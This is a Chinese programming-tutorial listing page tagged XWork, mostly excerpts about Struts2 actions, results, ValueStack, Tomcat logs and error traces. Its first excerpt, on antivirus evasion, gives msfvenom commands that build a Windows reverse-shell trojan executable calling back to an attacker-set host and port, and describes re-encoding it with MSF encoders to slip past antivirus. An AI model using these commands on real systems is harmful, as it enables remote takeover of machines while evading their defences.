XWork | 易学教程

攻击载荷免杀技术

阅读更多关于攻击载荷免杀技术

大多数杀毒软件使用特征码来识别恶意代码。特征码在杀毒引擎中，对磁盘和进程进行扫描匹配。为了避开杀毒软件，可以针对特征码创建一个独一无二的攻击载荷，它不与杀毒软件的任何特征码匹配。当直接渗透时，metasploit的攻击载荷可以只在内存中运行，不将任何数据写入到硬盘上，我们发起攻击并上传攻击载荷后，大多数杀毒软件都无法检测出来。 1.使用MSF攻击载荷生成器创建可独立运行的木马两条命令搞定 msfvenom -p windows/shell_reverse_tcp --payload-options msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.140（自己的IP）LPORT=31337（自己的端口）-f -exe -o payload1.exe 一个windows PE文件（便携可执行文件）木马 2.躲避杀毒软件的检测最佳方法之一，使用MSF编码器以百度杀毒为例子。在目标上实际部署攻击载荷前，需要弄清目标的反病毒方案，确保木马顺利运行使用MSF编码器，对木马文件进行重新编码。它能改变可执行文件中的代码形状。和电子邮件附件base64编码类似。当这个文件运行后，MSF编码器会将原始程序解码到内存中并执行。 msfvenom -l encoders 选择不同环境（比如x86，linux，PPC等）的编码格式

JavaWeb_(Struts2框架)Struts创建Action的三种方式

阅读更多关于 JavaWeb_(Struts2框架)Struts创建Action的三种方式

　　此系列博文基于同一个项目已上传至github　　传送门　　JavaWeb_(Struts2框架)Struts创建Action的三种方式　　传送门　　JavaWeb_(Struts2框架)struts.xml核心配置、动态方法调用、结果集的处理　　传送门　　JavaWeb_(Struts2框架)Log4j的配置以及解决中文乱码　　传送门　　JavaWeb_(Struts2框架)参数传递之接收参数与传递参数　　传送门　　JavaWeb_(Struts2框架)Ognl小案例查询帖子　　传送门　　JavaWeb_(Struts2框架)Action中struts-default下result的各种转发类型　　传送门　　JavaWeb_(Struts2框架)拦截器interceptor　　传送门　　　　第一种DefaultAction什么都没有干　　第二种实现了Action接口　　第三种继承了ActionSupport类【常用】　　目录结构　　 package com.Gary.web; public class DefaultAction { public String execute() { System.err.println( "这是一个普通的action" ); return null ; } } DefaultAction.java

Action封装：模型驱动

阅读更多关于 Action封装：模型驱动

区别在于Action和JSP Action： package com.example.struts; import com.example.struts.domain.User; import com.opensymphony.xwork2.Action; import com.opensymphony.xwork2.ModelDriven; public class UserModelAction implements Action, ModelDriven<User> { // 必须手动实例化 private User user = new User(); private String code; public String getCode() { return code; } public void setCode(String code) { this.code = code; } @Override public String execute() throws Exception { System.out.println(user); System.out.println(code); return NONE; } @Override public User getModel() { return user; } } jsp: <h2>模型驱动</h2> <form

jasper打印问题整理

阅读更多关于 jasper打印问题整理

出现错误 Exception occurred during processing request: null java.lang.reflect.InvocationTargetException at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method) at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62) at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43) at java.lang.reflect.Method.invoke(Method.java:498) at com.opensymphony.xwork2.interceptor.annotations.AnnotationWorkflowInterceptor.intercept(AnnotationWorkflowInterceptor.java:149) at com.opensymphony.xwork2.DefaultActionInvocation.invoke(DefaultActionInvocation

tomcat下面的各个日志

阅读更多关于 tomcat下面的各个日志

原文连接： https://www.cnblogs.com/qlqwjy/p/8036091.html 一、　　认识各种目录的作用及记录的信息目录 1.catalina.日期.log 　　这个主要是记录tomcat启动时候的信息，类似于我们在eclipse中启动服务的时候在控制台看到的信息。在里面可以看到启动的JVM参数以及操作系统等日志信息。如果没有使用log4j等日志机制，系统的的错误信息与打印语句也在这个日志文件中记录。( linux下所有的日志都在catalina.out中) 例如: 十二月 14, 2017 11:04:27 下午 org.apache.tomcat.util.digester.SetPropertiesRule begin 警告: [SetPropertiesRule]{Server/Service/Engine/Host/Context} Setting property 'debug' to '0' did not find a matching property. 十二月 14, 2017 11:04:27 下午 org.apache.tomcat.util.digester.SetPropertiesRule begin 警告: [SetPropertiesRule]{Server/Service/Engine/Host/Context}

How to post an array of custom objects with missing entries to Struts2 action

阅读更多关于 How to post an array of custom objects with missing entries to Struts2 action

问题 Tabular Inputs This suggests to use XWorkList instead of ArrayList , when the size of array is unknown & there are gaps in between. But XWorkList is not generic & it has no empty constructor, according to documentation My question is how to use XWorkList or is there any way to submit list of beans with some items missing in the list ? Sample Html: <input name="lst[0].name"/> <input name="lst[3].name"/> <input name="lst[4].name"/> 回答1: It's extending ArrayList and has a constructor that takes

Struts2里的Result

阅读更多关于 Struts2里的Result

【推荐】2019 Java 开发者跳槽指南.pdf(吐血整理) >>> Result 一、Result基础 Result是什么和能干什么？简单的说,Result是当Action处理完数据后返回的一个字符串，它指定了下一个页面的位置。比如： <action name="action_1" class="struts2.com.test.ActionSupport_1">  <result name="success">hellowordactionsuccess.jsp</result>  <result name="input">hellowordactionerror_1.jsp</result> </action> action返回的字符串对应的就是result标签里的name属性值。 Result有什么对于Result 在struts2中，预定义了以下一些Result的字符常量： SUCCESS:表示Action执行成功，显示结果视图给用户，值为字符串“success”。 NONE：表示Action执行成功，不需要显示视图给用户，值为字符串“none”。 ERROR：表示Action执行失败，显示错误页面给用户

Issues when deploying with Struts 2 web app

阅读更多关于 Issues when deploying with Struts 2 web app

问题 I am facing this error when running a web app in the Container. Expecting some help on the right direction to approach this issue. Caused by: Bean type class com.opensymphony.xwork2.ObjectFactory with the name xwork has already been loaded by bean - bundleresource://16756.fwk1755001097:42/struts-default.xml:29:72 - bean - jar:file:/C:/XXX/XXX/configuration/org.eclipse.osgi/bundles/16756/29/bundlefile/WEB-INF/lib/struts2-core-2.2.1.1.jar!/struts-default.xml:29:72 at com.opensymphony.xwork2

Is the ValueStack life cycle across the application in struts2?

阅读更多关于 Is the ValueStack life cycle across the application in struts2?

问题 I can set a property on ValueStack in several ways. ValueStack stack = ActionContext.getContext().getValueStack(); stack.getContext().put("resultDTO",resultDTO); //1. creates a different branch //parallel to root stack.set("resultDTO", resultDTO); //2. pushes on root as a Map? stack.push(resultDTO); //3. pushes on root myActionClass.setProperty(); //4. normal action accessor I need to be able to get all these values back in JSP, freemarker and java like stack.findValue() or stack.findString()

java.lang.NoSuchFieldException: resourceEntries struts2

阅读更多关于 java.lang.NoSuchFieldException: resourceEntries struts2

1、关于项目中使用struts2 报java.lang.NoSuchFieldException: resourceEntries 的问题。当我们使用tomcat 7.0.64 及以下的版本时是不会出问题的。当我们在使用tomcat 7.0.65时会报这个问题，网上看到很多解答都是说什么tomcat 8之类的。实际出现问题在tomcat 7.0.65 就开始了。出现这个问题的根源是因为。在64到65 的时候，org\apache\catalina\loader\WebappClassLoader.java 这个类进行了抽象，抽象出了org\apache\catalina\loader\WebappClassLoaderBase.java. 2、在我们用的struts2 的xwork 包内 \com\opensymphony\xwork2\util\LocalizedTextUtil.java内的清除tomcat 缓存的地方有问题。问题就初夏这个clearMap。java自带的getDeclaredField 是取不到父类的属性的。所以这里会一直报错。最新版的这两个方法： private static void clearTomcatCache() { ClassLoader loader = getCurrentThreadContextClassLoader(); //

订阅 XWork